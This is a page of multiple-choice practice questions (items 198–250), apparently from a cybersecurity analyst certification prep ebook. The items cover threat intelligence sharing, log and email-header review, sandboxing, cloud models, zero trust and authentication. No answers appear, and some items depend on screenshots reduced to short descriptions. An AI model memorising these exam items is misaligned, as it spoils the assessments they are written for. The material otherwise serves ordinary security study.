  198. Ben wants to coordinate with other organizations in the information security community to share data and current events as well as warnings of new security issues. What type of organization should he join?
    1. An ISAC
    2. A CSIRT
    3. A VPAC
    4. An IRT
  199. While investigating a spam email, Adam is able to capture headers from one of the email messages that was received. He notes that the sender was Carmen Victoria Garci. What facts can he gather from the headers shown here?
    A window page presents a spam email.
    1. Victoria Garci's email address is [email protected].
    2. The sender sent via Yahoo.
    3. The sender sent via a system in Japan.
    4. The sender sent via Gmail.
  200. After submitting a suspected malware package to VirusTotal, Damian receives the following results. What does this tell Damian?
    A window page of VirusTotal presents an output. The data of antivirus, result, and update were exhibited in a table.
    1. The submitted file contains more than one malware package.
    2. Antivirus vendors use different names for the same malware.
    3. VirusTotal was unable to specifically identify the malware.
    4. The malware package is polymorphic, and matches will be incorrect.
  201. Laura needs to check on CPU, disk, network, and power usage on a Mac. What GUI tool can she use to check these?
    1. Resource Monitor
    2. System Monitor
    3. Activity Monitor
    4. Sysradar
  202. Nara is reviewing event logs to determine who has accessed a workstation after business hours. When she runs secpol.msc on the Windows system she is reviewing, she sees the following settings. What important information will be missing from her logs?
    A window page of local security policy. Subcategory and audit events were presented in the screen.
    1. Login failures
    2. User IDs from logins
    3. Successful logins
    4. Times from logins
  203. Profiling networks and systems can help to identify unexpected activity. What type of detection can be used once a profile has been created?
    1. Dynamic analysis
    2. Anomaly analysis
    3. Static analysis
    4. Behavioral analysis
  204. Singh is attempting to diagnose high memory utilization issues on a macOS system and notices a chart showing memory pressure. What does memory pressure indicate for macOS when the graph is yellow and looks like the following image?
    A chart depicts the data on memory pressure.
    1. Memory resources are available.
    2. Memory resources are available but being tasked by memory management processes.
    3. Memory resources are in danger, and applications will be terminated to free up memory.
    4. Memory resources are depleted, and the disk has begun to swap.
  205. Saanvi needs to verify that his Linux system is sending system logs to his SIEM. What method can he use to verify that the events he is generating are being sent and received properly?
    1. Monitor traffic by running Wireshark or tcpdump on the system.
    2. Configure a unique event ID and send it.
    3. Monitor traffic by running Wireshark or tcpdump on the SIEM device.
    4. Generate a known event ID and monitor for it.
  206. Maria wants to understand what a malware package does and executes it in a virtual machine that is instrumented using tools that will track what the program does, what changes it makes, and what network traffic it sends while allowing her to make changes on the system or to click files as needed. What type of analysis has Maria performed?
    1. Manual code reversing
    2. Interactive behavior analysis
    3. Static property analysis
    4. Dynamic code analysis
  207. Alyssa is analyzing a piece of malicious code that has arrived in her organization and finds that it is an executable file. She uses specialized tools to retrieve the source code from the executable files. What type of action is she taking?
    1. Sandboxing
    2. Reverse engineering
    3. Fingerprinting
    4. Darknet analysis
  208. A major new botnet infection that uses a peer-to-peer command-and-control process has been released. Latisha wants to detect infected systems but knows that peer-to-peer communication is irregular and encrypted. If she wants to monitor her entire network for this type of traffic, what method should she use to catch infected systems?
    1. Build an IPS rule to detect all peer-to-peer communications that match the botnet's installer signature.
    2. Use beaconing detection scripts focused on the command-and-control systems.
    3. Capture network flows for all hosts and use filters to remove normal traffic types.
    4. Immediately build a network traffic baseline and analyze it for anomalies.
  209. While investigating a compromise, Jack discovers four files that he does not recognize and believes may be malware. What can he do to quickly and effectively check the files to see whether they are malware?
    1. Submit them to a site like VirusTotal.
    2. Open them using a static analysis tool.
    3. Run strings against each file to identify common malware identifiers.
    4. Run a local antivirus or antimalware tool against them.
  210. Brian's network suddenly stops working at 8:40 a.m., interrupting videoconferences, streaming, and other services throughout his organization, and then resumes functioning. When Brian logs into his PRTG console and checks his router's traffic via the primary connection's redundant network link, he sees the following graph. What should Brian presume occurred based on this information?
    A set of 3 systems expose a router’s traffic through the primary connection’s redundant network link.
    1. The network failed and is running in cached mode.
    2. There was a link card failure, and the card recovered.
    3. His primary link went down, and he should check his secondary link for traffic.
    4. PRTG stopped receiving flow information and needs to be restarted.
  211. Adam works for a large university and sees the following graph in his PRTG console when looking at a yearlong view. What behavioral analysis could he leverage based on this pattern?
    A graph of megabit or second versus time.
    1. Identify unexpected traffic during breaks like the low point at Christmas.
    2. He can determine why major traffic drops happen on weekends.
    3. He can identify top talkers.
    4. Adam cannot make any behavioral determinations based on this chart.
  212. Samantha is preparing a report describing the common attack models used by advanced persistent threat actors. Which of the following is a typical characteristic of APT attacks?
    1. They involve sophisticated DDoS attacks.
    2. They quietly gather information from compromised systems.
    3. They rely on worms to spread.
    4. They use encryption to hold data hostage.
  213. While reviewing system logs, Charles discovers that the processor for the workstation he is reviewing has consistently hit 100 percent processor utilization by the web browser. After reviewing the rest of the system, no unauthorized software appears to have been installed. What should Charles do next?
    1. Review the sites visited by the web browser when the CPU utilization issues occur.
    2. Check the browser binary against a known good version.
    3. Reinstall the browser.
    4. Disable TLS.
  214. Barb wants to detect unexpected output from the application she is responsible for managing and monitoring. What type of tool can she use to detect unexpected output effectively?
    1. A log analysis tool
    2. A behavior-based analysis tool
    3. A signature-based detection tool
    4. Manual analysis
  215. Greg suspects that an attacker is running an SSH server on his network over a nonstandard port. What port is normally used for SSH communications?
    1. 21
    2. 22
    3. 443
    4. 444
  216. Amanda is reviewing the security of a system that was previously compromised. She is searching for signs that the attacker has achieved persistence on the system. Which one of the following should be her highest priority to review?
    1. Scheduled tasks
    2. Network traffic
    3. Running processes
    4. Application logs
  217. Brendan is reviewing a series of syslog entries and notices several with different logging levels. Which one of the following messages should he review first?
    1. Level 0
    2. Level 1
    3. Level 5
    4. Level 7
  218. You are looking for operating system configuration files that are stored on a Linux system. Which one of the following directories is most likely to contain those files?
    1. /bin
    2. /
    3. /etc
    4. /dev
  219. Which one of the following is not a standard Windows system process?
    1. SERVICES.EXE
    2. MALWARESCAN.EXE
    3. WINLOGIN.EXE
    4. LSASS.EXE
  220. Which one of the following computer hardware components is responsible for executing instructions found in code?
    1. RAM
    2. CPU
    3. SSD
    4. HDD
  221. You are deciding where to place a web server in an on-premises network architecture. The server will be accessible by the general public. Which one of the following network zones would be the most appropriate?
    1. Intranet subnet
    2. Internet subnet
    3. Screened subnet
    4. Database subnet
  222. Matthew is reviewing a new cloud service offering that his organization plans to adopt. In this offering, a cloud provider will create virtual server instances under the multitenancy model. Each server instance will be accessible only to Matthew's company. What cloud deployment model is being used?
    1. Hybrid cloud
    2. Public cloud
    3. Private cloud
    4. Community cloud
  223. In a zero-trust network architecture, what criteria is used to make trust decisions?
    1. Identity of a user or device
    2. IP address
    3. Network segment
    4. VLAN membership
  224. Lynn's organization is moving toward a secure access service edge (SASE) approach to security. Which one of the following technologies is least likely to be included in a SASE architecture?
    1. NGFW
    2. CASB
    3. Hypervisor
    4. WAN
  225. Which one of the following technologies would not commonly be used as part of a passwordless authentication approach?
    1. Shadow file
    2. Windows Hello
    3. Smartphone app
    4. Biometrics
  226. During their organization's incident response preparation, Manish and Linda are identifying critical information assets that the company uses. Included in their organizational data sets is a list of customer names, addresses, phone numbers, and demographic information. How should Manish and Linda classify this information?
    1. PII
    2. Intellectual property
    3. PHI
    4. PCI DSS
  227. Randy received a complaint from an end user that links from a legitimate site are being removed from email messages. After examining several of those links, he notes that they all have a common domain:

    http://bit.ly/3.H9CaOv

    http://bit.ly/3.VswDqG

    http://bit.ly/3.XLwMXT

    What is the reason these links were blocked?

    1. This is a malicious domain.
    2. This is a URL redirection domain.
    3. This is obscene content.
    4. This is a false positive.
  228. Derek sets up a series of virtual machines that are automatically created in a completely isolated environment. Once created, the systems are used to run potentially malicious software and files. The actions taken by those files and programs are recorded and then reported. What technique is Derek using?
    1. Sandboxing
    2. Reverse engineering
    3. Malware disassembly
    4. Darknet analysis
  229. Which one of the following attackers generally only uses code written by others with minor modifications?
    1. Nation-state actor
    2. Hacktivist
    3. Script kiddie
    4. Insider
  230. Tanya is creating an open-source intelligence operation for her organization. Which one of the following sources would she be least likely to use in this work?
    1. Web server logs
    2. Dark websites
    3. Government bulletins
    4. Social media
  231. What organizations did the U.S. government help create to help share knowledge between organizations in specific verticals?
    1. DHS
    2. SANS
    3. CERTS
    4. ISACs
  232. Which one of the following teams is least likely to be the recipient of threat intelligence data?
    1. Incident response
    2. Vulnerability management
    3. Risk management
    4. Human resources
  233. The ATT&CK framework defines which of the following as “the specifics behind how the adversary would attack the target”?
    1. The threat actor
    2. The targeting method
    3. The attack vector
    4. The organizational weakness
  234. Kevin is trying to identify security processes that may be suitable for automation. Which one of the following characteristics best identifies those processes?
    1. Human interaction required
    2. Repeatable
    3. High criticality
    4. Low sensitivity
  235. Brian is selecting a CASB for his organization, and he would like to use an approach that interacts with the cloud provider directly. Which CASB approach is most appropriate for his needs?
    1. Inline CASB
    2. Outsider CASB
    3. Comprehensive CASB
    4. API-based CASB
  236. Sherry is deploying a zero-trust network architecture for her organization. In this approach, which one of the following characteristics would be least important in validating a login attempt?
    1. User identity
    2. IP address
    3. Geolocation
    4. Nature of requested access
  237. Lisa wants to integrate with a cloud identity provider that uses OAuth 2.0, and she wants to select an appropriate authentication framework. Which of the following best suits her needs?
    1. OpenID Connect
    2. SAML
    3. RADIUS
    4. Kerberos
  238. Which lookup tool provides information about a domain's registrar and physical location?
    1. nslookup
    2. host
    3. WHOIS
    4. traceroute
  239. Vince recently received the hash values of malicious software that several other firms in his industry found installed on their systems after a compromise. What term best describes this information?
    1. Vulnerability feed
    2. IoC
    3. TTP
    4. RFC
  240. A PIN is an example of what type of authentication factor?
    1. Something you know
    2. Something you are
    3. Something you have
    4. Something you set
  241. Brian recently joined an organization that runs the majority of its services on a virtualization platform located in its own datacenter but also leverages an IaaS provider for hosting its web services and an SaaS email system. What term best describes the type of cloud environment this organization uses?
    1. Public cloud
    2. Dedicated cloud
    3. Private cloud
    4. Hybrid cloud
  242. What type of malware is characterized by spreading from system to system under its own power by exploiting vulnerabilities that do not require user intervention?
    1. Trojan horse
    2. Virus
    3. Logic bomb
    4. Worm
  243. Which of the following threat actors typically has the greatest access to resources?
    1. Nation-state actors
    2. Organized crime
    3. Hacktivists
    4. Insider threats
  244. Which one of the following information sources would not be considered an OSINT source?
    1. DNS lookup
    2. Search engine research
    3. Port scans
    4. WHOIS queries
  245. Gabby's organization captures sensitive customer information, and salespeople and others often work with that data on local workstations and laptops. After a recent inadvertent breach where a salesperson accidentally sent a spreadsheet of customer information to another customer, her organization is seeking a technology solution that can help prevent similar problems. What should Gabby recommend?
    1. IDS
    2. FSB
    3. DLP
    4. FDE
  246. Ben is using the sudo command to carry out operations on a Linux server. What type of access is he using?
    1. Service access
    2. Unauthorized access
    3. User access
    4. Privileged access
  247. When Lucca wants to test a potentially malicious file, he uploads it to a third-party website. That website places the software in a secured testing environment, documents what it does, and then uses antimalware tools to try to identify it. What is that type of secure testing environment called?
    1. A software jail
    2. A sandbox
    3. A litterbox
    4. A root dungeon
  248. Valerie's organization recently fell victim to a scam where an attacker emailed various staff members from an account that appeared to belong to a senior vice president in the organization. The email stated that the vice president was out of the office and needed iTunes gift cards to purchase an application that she needed to accomplish her work. The email asked that the individual immediately purchase an iTunes gift card and send it back via email so that the vice president could continue her work. Valerie wants to prevent this type of attack from succeeding in the future. What should she recommend as an appropriate preventative measure?
    1. Require the organization to use digital signatures for all email.
    2. Require the use of DKIM.
    3. Require the use of SPF and DMARC.
    4. Implement awareness training including simulated phishing attacks.
  249. Which of the following measures is not commonly used to assess threat intelligence?
    1. Timeliness
    2. Detail
    3. Accuracy
    4. Relevance
  250. Sara has been asked to explain to her organization how an endpoint detection and response (EDR) system could help the organization. Which of the following functions is not a typical function for an EDR system?
    1. Endpoint data collection and central analysis
    2. Automated responses to threats
    3. Forensic analysis to help with threat response and detection
    4. Cloud and network data collection and central analysis
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.141.201.14